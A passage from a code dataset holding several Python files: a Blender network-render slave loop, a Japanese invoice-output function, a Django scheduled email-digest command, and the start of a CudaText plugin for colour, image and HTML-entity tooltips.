print(\"File:\", main_file, \"and %i other files\" % (len(job.files) - 1,))\n\n for rfile in job.files[1:]:\n testFile(conn, job.id, slave_id, rfile, JOB_PREFIX, main_path)\n print(\"\\t\", rfile.filepath)\n \n netrender.repath.update(job)\n\n engine.update_stats(\"\", \"Render File \"+ main_file+ \" for job \"+ job.id)\n elif job.type == netrender.model.JOB_VCS:\n if not job.version_info:\n # Need to return an error to server, incorrect job type\n pass\n \n job_path = job.files[0].filepath # path of main file\n main_path, main_file = os.path.split(job_path)\n \n job.version_info.update()\n \n # For VCS jobs, file path is relative to the working copy path\n job_full_path = os.path.join(job.version_info.wpath, job_path)\n \n engine.update_stats(\"\", \"Render File \"+ main_file+ \" for job \"+ job.id)\n\n # announce log to master\n logfile = netrender.model.LogFile(job.id, slave_id, [frame.number for frame in job.frames])\n conn.request(\"POST\", \"/log\", bytes(json.dumps(logfile.serialize()), encoding='utf8'))\n response = conn.getresponse()\n response.read()\n\n\n first_frame = job.frames[0].number\n\n # start render\n start_t = time.time()\n\n if job.rendersWithBlender():\n frame_args = []\n\n for frame in job.frames:\n print(\"frame\", frame.number)\n frame_args += [\"-f\", str(frame.number)]\n\n val = SetErrorMode()\n process = subprocess.Popen([BLENDER_PATH, \"-b\", \"-noaudio\", job_full_path, \"-t\", str(threads), \"-o\", os.path.join(JOB_PREFIX, \"######\"), \"-E\", \"BLENDER_RENDER\", \"-F\", \"MULTILAYER\"] + frame_args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n RestoreErrorMode(val)\n elif job.type == netrender.model.JOB_PROCESS:\n command = job.frames[0].command\n val = SetErrorMode()\n process = subprocess.Popen(command.split(\" \"), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n RestoreErrorMode(val)\n\n headers = {\"slave-id\":slave_id}\n\n cancelled = False\n stdout = bytes()\n run_t = time.time()\n while not cancelled and process.poll() is None:\n stdout += process.stdout.read(1024)\n current_t = time.time()\n cancelled = engine.test_break()\n if current_t - run_t > CANCEL_POLL_SPEED:\n\n # update logs if needed\n if stdout:\n # (only need to update on one frame, they are linked\n conn.request(\"PUT\", logURL(job.id, first_frame), stdout, headers=headers)\n responseStatus(conn)\n \n # Also output on console\n if netsettings.use_slave_output_log:\n print(str(stdout, encoding='utf8'), end=\"\")\n\n stdout = bytes()\n\n run_t = current_t\n if testCancel(conn, job.id, first_frame):\n cancelled = True\n\n if job.type == netrender.model.JOB_BLENDER:\n netrender.repath.reset(job)\n\n # read leftovers if needed\n stdout += process.stdout.read()\n\n if cancelled:\n # kill process if needed\n if process.poll() is None:\n try:\n process.terminate()\n except OSError:\n pass\n continue # to next frame\n\n # flush the rest of the logs\n if stdout:\n # Also output on console\n if netsettings.use_slave_thumb:\n print(str(stdout, encoding='utf8'), end=\"\")\n \n # (only need to update on one frame, they are linked\n conn.request(\"PUT\", logURL(job.id, first_frame), stdout, headers=headers)\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n\n total_t = time.time() - start_t\n\n avg_t = total_t / len(job.frames)\n\n status = process.returncode\n\n print(\"status\", status)\n\n headers = {\"job-id\":job.id, \"slave-id\":slave_id, \"job-time\":str(avg_t)}\n\n\n if status == 0: # non zero status is error\n headers[\"job-result\"] = str(DONE)\n for frame in job.frames:\n headers[\"job-frame\"] = str(frame.number)\n if job.hasRenderResult():\n # send image back to server\n\n filename = os.path.join(JOB_PREFIX, \"%06d.exr\" % frame.number)\n\n # thumbnail first\n if netsettings.use_slave_thumb:\n thumbname = thumbnail.generate(filename)\n \n if thumbname:\n f = open(thumbname, 'rb')\n conn.request(\"PUT\", \"/thumb\", f, headers=headers)\n f.close()\n responseStatus(conn)\n\n f = open(filename, 'rb')\n conn.request(\"PUT\", \"/render\", f, headers=headers)\n f.close()\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n\n elif job.type == netrender.model.JOB_PROCESS:\n conn.request(\"PUT\", \"/render\", headers=headers)\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n else:\n headers[\"job-result\"] = str(ERROR)\n for frame in job.frames:\n headers[\"job-frame\"] = str(frame.number)\n # send error result back to server\n conn.request(\"PUT\", \"/render\", headers=headers)\n if responseStatus(conn) == http.client.NO_CONTENT:\n continue\n\n engine.update_stats(\"\", \"Network render connected to master, waiting for jobs\")\n else:\n bisleep.sleep()\n\n conn.close()\n\n if netsettings.use_slave_clear:\n clearSlave(NODE_PREFIX)\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "damiles/blendocv", "sub_path": "release/scripts/addons/netrender/slave.py", "file_name": "slave.py", "file_ext": "py", "file_size_in_byte": 13914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 31, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 41, "usage_type": "attribute"}, {"api_name": "platform.version", "line_number": 43, "usage_type": "call"}, {"api_name": "ctypes.windll.kernel32.SetErrorMode", "line_number": 46, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 46, "usage_type": "attribute"}, {"api_name": "ctypes.windll.kernel32.SetErrorMode", "line_number": 47, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 47, "usage_type": "attribute"}, {"api_name": "ctypes.windll.kernel32.SetErrorMode", "line_number": 51, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 51, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 60, "usage_type": "call"}, {"api_name": "platform.uname", "line_number": 63, "usage_type": "call"}, {"api_name": "netrender.utils.model.RenderSlave", "line_number": 64, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 64, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 64, "usage_type": "name"}, {"api_name": "http.client", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.renames", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 119, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 130, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 136, "usage_type": "call"}, {"api_name": "os.W_OK", "line_number": 136, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 166, "usage_type": "call"}, {"api_name": "http.client", "line_number": 174, "usage_type": "attribute"}, {"api_name": "netrender.utils.model.RenderJob.materialize", "line_number": 177, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 177, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 177, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 182, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 186, "usage_type": "attribute"}, {"api_name": "netrender.utils.model", "line_number": 189, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 189, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "netrender.utils.repath.update", "line_number": 201, "usage_type": "call"}, {"api_name": "netrender.utils.repath", "line_number": 201, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 201, "usage_type": "name"}, {"api_name": "netrender.utils.model", "line_number": 204, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 204, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "netrender.utils.model.LogFile", "line_number": 220, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 220, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 220, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 221, "usage_type": "call"}, {"api_name": "time.time", "line_number": 229, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path", "line_number": 239, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 239, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 239, "usage_type": "attribute"}, {"api_name": "netrender.utils.model", "line_number": 241, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 241, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 244, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 244, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 244, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 251, "usage_type": "call"}, {"api_name": "time.time", "line_number": 254, "usage_type": "call"}, {"api_name": "netrender.utils.model", "line_number": 274, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 274, "usage_type": "name"}, {"api_name": "netrender.utils.repath.reset", "line_number": 275, "usage_type": "call"}, {"api_name": "netrender.utils.repath", "line_number": 275, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 275, "usage_type": "name"}, {"api_name": "http.client", "line_number": 297, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "netrender.thumbnail.generate", "line_number": 322, "usage_type": "call"}, {"api_name": "netrender.thumbnail", "line_number": 322, "usage_type": "name"}, {"api_name": "http.client", "line_number": 333, "usage_type": "attribute"}, {"api_name": "netrender.utils.model", "line_number": 336, "usage_type": "attribute"}, {"api_name": "netrender.utils", "line_number": 336, "usage_type": "name"}, {"api_name": "http.client", "line_number": 338, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 346, "usage_type": "attribute"}]} +{"seq_id": "5036194987", "text": "def out_bill(data,column,billing_amount,shipping_fee,billdate,bill_info,customer_name,sum_total,sum_total_tax,sum_tax):\r\n import pandas\r\n from pandas import DataFrame\r\n import unicodedata\r\n from tabulate import tabulate\r\n import datetime\r\n import sys\r\n sys.path.append(\"/Users/User/Documents/seigo_final/customers/c_folder\")\r\n import yes_no\r\n\r\n \"\"\"\r\n tabulate.WIDE_CHARS_MODE = False\r\n \"\"\"\r\n\r\n print(\"\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n\r\n df = pandas.DataFrame(data=data, columns=column)\r\n result = tabulate(df, df.columns,tablefmt = \"github\",showindex=False)\r\n\r\n a = \"【明細書】\\n請求日:\"+billdate[0].strftime('%Y年%m月%d日')+\"\\n入金期限:\"+billdate[1].strftime('%Y年%m月%d日')\r\n line = \"\\n-----------------------------------------\\n\"\r\n b = \"【お客様情報】\\n名前:\"+bill_info[0]+\"\\n郵便番号:\"+bill_info[1]+\"\\n住所:\"+bill_info[2]+\"\\n電話番号:\"+bill_info[3]+\"\\nメールアドレス:\"+bill_info[4]\r\n c = \"【明細情報】\\n\\n\\n\" + result\r\n d = \"\\n\\n配送料:\" + str(shipping_fee)\r\n g = \"\\n税抜合計額:\" + str(sum_total) +\"円\"\r\n h = \"\\n税額合計:\" + str(sum_tax) + \"円\"\r\n e = \"\\n税込合計額:\" + str(billing_amount) +\"円\"\r\n\r\n i = \"【お問い合わせ先】\\n\"\r\n k = \"住所:東京都赤坂2-14-32 赤坂2・14プラザビル 4階\"\r\n l = \"\\n電話番号:03-3560-4061\"\r\n m = \"\\nメールアドレス:atsushi.kato@ctp.co.jp\"\r\n n = \"\\nご利用ありがとうございました。\"\r\n\r\n z = a + line + b + line + c + d + g + h + e + line + i + k + l + m + n\r\n\r\n print(z)\r\n print(\"\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n上記の明細書を出力してもよろしいですか:\")\r\n num = yes_no.yes_no_only()\r\n if num == 1:\r\n now = datetime.datetime.now()\r\n filename = customer_name + \"_\" + now.strftime('%Y%m%d_%H%M%S') + '.txt'\r\n f = open(\"C:\\\\Users\\\\User\\\\Documents\\\\seigo_final\\\\VVstore\\\\output\\\\for_picking\\\\\"+filename, 'w')\r\n f.write(z)\r\n f.close()\r\n print(filename + \"が出力されました\")\r\n else:\r\n print(\"\\n出力がキャンセルされました\\n\\n\")\r\n", "repo_name": "tokazaki13/seigo_final_taishi", "sub_path": "VVstore/VV_folder/out_for_deliver.py", "file_name": "out_for_deliver.py", "file_ext": "py", "file_size_in_byte": 2316, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 17, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 18, "usage_type": "call"}, {"api_name": "yes_no.yes_no_only", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "42887567150", "text": "import logging\nimport requests\nimport lxml.html\n\n\nfrom django.conf import settings\nfrom datetime import datetime\nfrom Lib.datetime import timedelta\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.mail import send_mail\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\n\n\n\nfrom ...models import Category\n\nlogger = logging.getLogger(__name__)\n\n\ndef send_email():\n message = ''\n categories = Category.objects.all()\n for category in categories:\n posts_cat = category.posts.all()\n print(posts_cat)\n post_filter = posts_cat.filter(post_date_time__gt=datetime.now() - timedelta(days=7))\n print(post_filter)\n for post in post_filter:\n post_url = f'http://127.0.0.1:8000/{post.pk}'\n message += f'{post.post_title} \\n {post.post_text[:50]}...\\n Follow link: {post_url}\\n'\n categories = post.post_category.all()\n cat_id = 0\n for c in categories:\n cat_id = c.id\n print(cat_id)\n\n get_subscribers = Category.objects.get(id=cat_id)\n subs_list = get_subscribers.subscribers.all()\n print(subs_list)\n for sub in subs_list:\n send_to = sub.email\n send_to_uname = sub.username\n send_mail(\n subject=f'Dear {send_to_uname}! Please, get the latest news!',\n message=message,\n from_email='zhuparadamova@yandex.ru',\n recipient_list=[send_to]\n )\n\n\n\n# функция которая будет удалять неактуальные задачи\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"This job deletes all apscheduler job executions older than `max_age` from the database.\"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs apscheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n # добавляем работу нашему задачнику\n\n scheduler.add_job(\n send_email,\n trigger=CronTrigger(second=\"*/604_800\"),\n # Тоже самое что и интервал, но задача тригера таким образом более понятна django\n id=\"send_email\", # уникальный айди\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\n \"Added weekly job: 'send_email'.\"\n )\n\n scheduler.add_job(\n delete_old_job_executions,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"00\", minute=\"00\"\n ),\n # Каждую неделю будут удаляться старые задачи, которые либо не удалось выполнить, либо уже выполнять не надо.\n id=\"delete_old_job_executions\",\n max_instances=1,\n replace_existing=True,\n )\n\n logger.info(\n \"Added weekly job: 'delete_old_job_executions'.\"\n )\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")", "repo_name": "Zhupar/NewsPaper", "sub_path": "NewsPaper/news/management/commands/runapscheduler.py", "file_name": "runapscheduler.py", "file_ext": "py", "file_size_in_byte": 3722, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Category.objects.all", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "Lib.datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Category.objects.get", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 41, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 47, "usage_type": "call"}, {"api_name": "django_apscheduler.models.DjangoJobExecution.objects.delete_old_job_executions", "line_number": 59, "usage_type": "call"}, {"api_name": "django_apscheduler.models.DjangoJobExecution.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "django_apscheduler.models.DjangoJobExecution", "line_number": 59, "usage_type": "name"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 62, "usage_type": "name"}, {"api_name": "apscheduler.schedulers.blocking.BlockingScheduler", "line_number": 66, "usage_type": "call"}, {"api_name": "django.conf.settings.TIME_ZONE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 66, "usage_type": "name"}, {"api_name": "django_apscheduler.jobstores.DjangoJobStore", "line_number": 67, "usage_type": "call"}, {"api_name": "apscheduler.triggers.cron.CronTrigger", "line_number": 73, "usage_type": "call"}, {"api_name": "apscheduler.triggers.cron.CronTrigger", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "28761922362", "text": "import re\nimport json\nimport os\nimport html\nfrom cudatext import *\nfrom .colorcodes import *\n\nfn_ini = os.path.join(app_path(APP_DIR_SETTINGS), 'cuda_html_tooltips.ini')\nMY_TAG = 101 #uniq value for all plugins with ed.hotspots()\n\nLEXERS_CSS = 'CSS,SCSS,Sass,LESS'\nREGEX_COLORS = r'(\\#[0-9a-f]{3}\\b)|(\\#[0-9a-f]{6}\\b)'\nREGEX_RGB = r'\\brgba?\\(\\s*(\\d+%?)\\s*[,\\s]\\s*(\\d+%?)\\s*[,\\s]\\s*(\\d+%?)\\s*([,\\s/]\\s*[\\d\\.%?]+\\s*)?\\)'\nREGEX_PIC = r'(\\'|\")[^\\'\"]+?\\.(png|gif|jpg|jpeg|bmp|ico)\\1'\nREGEX_PIC_CSS = r'\\([^\\'\"\\(\\)]+?\\.(png|gif|jpg|jpeg|bmp|ico)\\)'\nREGEX_ENT = r'&\\#?\\w+;'\n\nre_colors_compiled = re.compile(REGEX_COLORS, re.I)\nre_rgb_compiled = re.compile(REGEX_RGB, re.I)\nre_pic_compiled = re.compile(REGEX_PIC, re.I)\nre_pic_css_compiled = re.compile(REGEX_PIC_CSS, re.I)\nre_ent_compiled = re.compile(REGEX_ENT, 0)\n\nFORM_COLOR_W = 170\nFORM_COLOR_H = 25\nFORM_PIC_W_MAX = 270\nFORM_PIC_W_MIN = 50\nFORM_PIC_H_MAX = 220\nFORM_PIC_H_MIN = 50\nFORM_ENT_W = 50\nFORM_ENT_H = 50\nFORM_ENT_FONT_SIZE = 28\nFORM_GAP = 4\nFORM_GAP_OUT = 0\nFORM_GAP_OUT_COLOR = 0 #-1\nFORM_COLOR_KEEP = False\nCOLOR_FORM_BACK = 0x505050\nCOLOR_FORM_FONT = 0xE0E0E0\nCOLOR_FORM_FONT2 = 0x40E0E0\nCOLOR_FORM_PANEL_BORDER = 0xFFFFFF\nMAX_LINES = 5000\n\ndef str2color(s):\n perc = s.endswith('%')\n if perc:\n s = s[:-1]\n n = int(s)\n if perc:\n n = n*255//100\n return n\n\n\nclass Command:\n\n def __init__(self):\n\n self.load_config()\n self.init_form_color()\n self.init_form_pic()\n self.init_form_ent()\n\n def on_change_slow(self, ed_self):\n\n self.find_hotspots(ed_self)\n\n def on_open(self, ed_self):\n\n self.find_hotspots(ed_self)\n\n def find_hotspots(self, ed):\n\n ed.hotspots(HOTSPOT_DELETE_BY_TAG, tag=MY_TAG)\n count = 0\n use_count = min(ed.get_line_count(), MAX_LINES)\n\n for nline in range(use_count):\n line = ed.get_text_line(nline)\n\n #find entities\n for item in re_ent_compiled.finditer(line):\n span = item.span()\n data = json.dumps({\n 'ent': item.group(0),\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #find colors\n for item in re_colors_compiled.finditer(line):\n span = item.span()\n data = json.dumps({\n 'color': item.group(0),\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #find rgb\n for item in re_rgb_compiled.finditer(line):\n span = item.span()\n data = json.dumps({\n 'rgb': item.group(0),\n 'r': str2color(item.group(1)),\n 'g': str2color(item.group(2)),\n 'b': str2color(item.group(3)),\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #find pics, only for named files\n if ed.get_filename():\n for item in re_pic_compiled.finditer(line):\n span = item.span()\n text = item.group(0)[1:-1]\n if 'http://' in text: continue\n if 'https://' in text: continue\n\n data = json.dumps({\n 'pic': text,\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #same for CSS lexers\n lexer = ed.get_prop(PROP_LEXER_FILE)\n if ed.get_filename() and (','+lexer+',' in ','+LEXERS_CSS+','):\n for item in re_pic_css_compiled.finditer(line):\n span = item.span()\n text = item.group(0)[1:-1]\n if 'http://' in text: continue\n if 'https://' in text: continue\n\n data = json.dumps({\n 'pic': text,\n 'x': span[0],\n 'y': nline,\n })\n\n ed.hotspots(HOTSPOT_ADD,\n tag=MY_TAG,\n tag_str=data,\n pos=(span[0], nline, span[1], nline)\n )\n count += 1\n\n #print('HTML Tooltips: %d items'%count)\n\n\n def dlgcolor_mouse_exit(self, id_dlg, id_ctl, data='', info=''):\n\n if not self.is_mouse_in_form(id_dlg):\n dlg_proc(id_dlg, DLG_HIDE)\n\n\n def on_hotspot(self, ed_self, entered, hotspot_index):\n\n if not entered:\n allow = FORM_COLOR_KEEP and self.is_mouse_in_form(self.h_dlg_color)\n if allow: return\n self.hide_forms()\n\n else:\n self.hide_forms()\n hotspot = ed_self.hotspots(HOTSPOT_GET_LIST)[hotspot_index]\n if hotspot['tag'] != MY_TAG: return\n\n data = json.loads(hotspot['tag_str'])\n text = data.get('color', '')\n if text:\n self.update_form_color(text)\n h_dlg = self.h_dlg_color\n else:\n text = data.get('pic', '')\n if text:\n if not self.update_form_pic(ed_self, text): return\n h_dlg = self.h_dlg_pic\n else:\n text = data.get('ent', '')\n if text:\n if not self.update_form_ent(text): return\n h_dlg = self.h_dlg_ent\n else:\n text = data.get('rgb', '')\n if text:\n self.update_form_rgb(text, data['r'], data['g'], data['b'])\n h_dlg = self.h_dlg_color\n else:\n return\n\n prop = dlg_proc(h_dlg, DLG_PROP_GET)\n form_w = prop['w']\n form_h = prop['h']\n\n pos_x = data['x']\n pos_y = data['y']\n pos = ed_self.convert(CONVERT_CARET_TO_PIXELS, x=pos_x, y=pos_y)\n\n gap_out = FORM_GAP_OUT_COLOR if h_dlg==self.h_dlg_color else FORM_GAP_OUT\n cell_size = ed_self.get_prop(PROP_CELL_SIZE)\n ed_coord = ed_self.get_prop(PROP_COORDS)\n ed_size_x = ed_coord[2]-ed_coord[0]\n ed_size_y = ed_coord[3]-ed_coord[1]\n hint_x = pos[0]\n hint_y = pos[1] + cell_size[1] + gap_out\n\n #no space on bottom?\n if hint_y + form_h > ed_size_y:\n hint_y = pos[1] - form_h - gap_out\n\n #no space on right?\n if hint_x + form_w > ed_size_x:\n hint_x = ed_size_x - form_w\n\n dlg_proc(h_dlg, DLG_PROP_SET, prop={\n 'p': ed_self.h, #set parent to Editor handle\n 'x': hint_x,\n 'y': hint_y,\n })\n dlg_proc(h_dlg, DLG_SHOW_NONMODAL)\n if h_dlg==self.h_dlg_color:\n self.update_form_color_size()\n\n\n def hide_forms(self):\n\n dlg_proc(self.h_dlg_color, DLG_HIDE)\n dlg_proc(self.h_dlg_pic, DLG_HIDE)\n dlg_proc(self.h_dlg_ent, DLG_HIDE)\n\n\n def init_form_color(self):\n\n h = dlg_proc(0, DLG_CREATE)\n self.h_dlg_color = h\n\n dlg_proc(h, DLG_PROP_SET, prop={\n 'w': FORM_COLOR_W+2*FORM_GAP,\n 'border': False,\n 'color': COLOR_FORM_BACK,\n 'on_mouse_exit': self.dlgcolor_mouse_exit,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'colorpanel')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'panel_color',\n 'align': ALIGN_TOP,\n 'sp_a': FORM_GAP,\n 'h': FORM_COLOR_H,\n 'ex0': 1,\n 'ex1': 0x808080,\n 'ex2': 0x202020,\n 'ex3': COLOR_FORM_PANEL_BORDER,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_text',\n 'cap': '?',\n 'font_color': COLOR_FORM_FONT2,\n 'align': ALIGN_TOP,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'y': 200,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_rgb',\n 'cap': '??',\n 'font_color': COLOR_FORM_FONT,\n 'align': ALIGN_TOP,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'y': 220,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_hls',\n 'cap': '??',\n 'font_color': COLOR_FORM_FONT,\n 'align': ALIGN_TOP,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'y': 240,\n })\n\n\n def init_form_pic(self):\n\n h = dlg_proc(0, DLG_CREATE)\n self.h_dlg_pic = h\n\n dlg_proc(h, DLG_PROP_SET, prop={\n 'w': FORM_PIC_W_MAX,\n 'h': FORM_PIC_H_MAX,\n 'border': False,\n 'color': COLOR_FORM_BACK,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'label')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_text',\n 'cap': '??',\n 'font_color': COLOR_FORM_FONT,\n 'align': ALIGN_TOP,\n 'sp_a': FORM_GAP,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'image')\n self.h_img = dlg_proc(h, DLG_CTL_HANDLE, index=n)\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'img',\n 'align': ALIGN_CLIENT,\n 'sp_l': FORM_GAP,\n 'sp_r': FORM_GAP,\n 'sp_b': FORM_GAP,\n 'ex0': True, #center\n 'ex1': True, #stretch\n 'ex2': True, #stretch in\n 'ex3': False, #stretch out\n 'ex4': True, #keep origin x\n 'ex5': True, #keep origin y\n })\n\n\n def init_form_ent(self):\n\n h = dlg_proc(0, DLG_CREATE)\n self.h_dlg_ent = h\n\n dlg_proc(h, DLG_PROP_SET, prop={\n 'w': FORM_ENT_W,\n 'h': FORM_ENT_H,\n 'border': False,\n 'color': COLOR_FORM_BACK,\n })\n\n n = dlg_proc(h, DLG_CTL_ADD, 'colorpanel')\n dlg_proc(h, DLG_CTL_PROP_SET, index=n, prop={\n 'name': 'label_text',\n 'cap': '??',\n 'color': COLOR_FORM_BACK,\n 'font_color': COLOR_FORM_FONT,\n 'font_size': FORM_ENT_FONT_SIZE,\n 'align': ALIGN_CLIENT,\n })\n\n\n def update_form_color(self, text):\n\n ncolor = HTMLColorToPILColor(text)\n r, g, b = HTMLColorToRGB(text)\n self.update_form_color_ex(text, ncolor, r, g, b)\n\n def update_form_rgb(self, text, r, g, b):\n\n ncolor = 